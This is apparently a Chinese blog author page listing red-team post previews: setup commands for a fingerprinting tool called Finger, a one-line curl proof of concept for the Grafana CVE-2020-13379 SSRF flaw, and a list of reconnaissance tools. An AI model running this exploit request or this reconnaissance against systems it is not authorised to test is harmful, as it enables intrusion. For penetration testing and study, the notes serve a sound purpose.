![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
RedTeam
红队
吴
这个作者很懒,什么都没留下…
展开
-
红队信息收集-Finger(指纹识别)
一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具安装git clone https://github.com/EASY233/Finger.gitcd Fingerpip3 install -r requirements.txtpython3 Finger.py -h相关参数-u 对单个URL进行指纹识别-f 对指定文件中的url进行批量指纹识别-i 对ip进行fofa数据查询采集其web资产-if 对指定文件中的ip批量调用fofa进行数据查询采集其web资产-fo.原创 2022-01-28 10:58:15 · 4452 阅读 · 1 评论 -
Grafana CVE-2020-13379 SSRF漏洞
poccurl -I http://{url}//avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D效果截图不存在漏洞如果使用自签名证书 curl报错,可添加-k参数原创 2021-11-25 16:36:41 · 1754 阅读 · 0 评论 -
RedTeam之信息收集
敏感信息挖掘机Oneforall(子域名收集工具)TeemoSubdomainSqlmapBPhttps://www.robtex.com(推荐)网页信息泄露前端代码chrome的检查whoischinazICP备案信息Web指纹yunsee.cnriskiq.com原创 2021-10-19 13:55:34 · 2072 阅读 · 0 评论